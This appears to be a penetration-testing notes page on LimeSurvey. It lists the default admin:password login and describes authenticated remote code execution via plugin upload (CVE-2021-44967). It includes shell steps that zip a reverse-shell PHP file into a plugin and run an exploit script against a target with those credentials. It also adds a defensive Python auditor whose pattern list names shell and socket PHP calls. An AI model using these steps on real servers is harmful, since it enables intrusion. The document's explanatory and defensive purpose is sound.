LimeSurvey
LimeSurvey is an open-source web application designed for creating and managing online surveys. Built in PHP and typically backed by MySQL or PostgreSQL, it enables users to design complex questionnaires with a variety of question types, conditional logic, and customizable layouts. It supports user management, survey quotas, multilingual functionality, and detailed result export options, making it suitable for academic, commercial, and organizational data collection.
Default Credentials
The default credentials are: admin:password.
Authenticated RCE
LimeSurvey version 5.2.4 is affected by an RCE vulnerability (CVE-2021-44967) tied to the plugin upload and installation feature. The core issue lies in the ability to upload a plugin containing arbitrary PHP code, which is then executed by the application during installation. This behavior allows for direct code execution on the server hosting LimeSurvey.
The vendor disputes the classification of this as a vulnerability. According to the official stance, plugin installation is a feature restricted to superadmin users, and plugins are expected to include executable PHP code by design. From that perspective, the ability to upload and execute such code is part of the intended functionality and not considered a security flaw within the LimeSurvey threat model.
A working PoC is available:
# Modify as needed
$ nano revshell.php
# Create the archive
$ zip -r x7331.zip config.xml revshell.php
adding: config.xml (deflated 58%)
adding: revshell.php (deflated 68%)
# Modify as needed
$ nano exploit.py
# Execute the exploit
$ uv run exploit.py http://customers-survey.marketing.pg/ admin password 80
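Since a plugin archive is a ZIP holding config.xml plus PHP that the server will run, a reviewer can inspect it before a superadmin installs it. The following is an added example, not code from the original page or from LimeSurvey. The function names, the list of flagged PHP calls and the sample archive are assumptions constructed for illustration.

```python
import io
import re
import zipfile

# PHP calls that give code process or socket access. This is a heuristic list
# chosen for this example, not a LimeSurvey-defined policy.
RISKY_CALLS = re.compile(
    rb"\b(fsockopen|proc_open|popen|shell_exec|passthru|system|exec|eval|"
    rb"pcntl_exec|stream_socket_client)\s*\(", re.IGNORECASE)
PHP_EXT = re.compile(r"\.(php\d?|phtml|phar)$", re.IGNORECASE)


def audit_plugin_zip(data: bytes) -> dict:
    """Return a review report for a plugin archive given as raw ZIP bytes."""
    report = {"has_config": False, "php_files": [], "findings": [], "unsafe_paths": []}
    with zipfile.ZipFile(io.BytesIO(data)) as zf:
        for info in zf.infolist():
            name = info.filename
            # Entries that would land outside the extraction directory.
            if name.startswith("/") or ".." in name.split("/"):
                report["unsafe_paths"].append(name)
            if name.lower() == "config.xml":
                report["has_config"] = True
            if info.is_dir() or not PHP_EXT.search(name):
                continue
            report["php_files"].append(name)
            # Record file, line number and call name for each flagged call.
            for lineno, line in enumerate(zf.read(info).splitlines(), 1):
                for m in RISKY_CALLS.finditer(line):
                    report["findings"].append((name, lineno, m.group(1).decode().lower()))
    return report


def build_sample() -> bytes:
    """Constructed sample archive: a config.xml, one PHP file, one text file."""
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w") as zf:
        zf.writestr("config.xml", "<config><metadata><name>Sample</name></metadata></config>")
        zf.writestr("Sample.php", "<?php\n$s = fsockopen($h, $p);\nproc_open('sh', $d, $pipes);\n")
        zf.writestr("readme.txt", "system( is only text here\n")
    return buf.getvalue()


if __name__ == "__main__":
    r = audit_plugin_zip(build_sample())
    print("config.xml present:", r["has_config"])
    for name, lineno, call in r["findings"]:
        print(f"{name}:{lineno}: calls {call}()")
```

A pattern list like this is a review aid only and obfuscated PHP will pass it. Because the vendor treats plugin installation as intended superadmin functionality, the effective controls are changing the default admin password and limiting who holds superadmin.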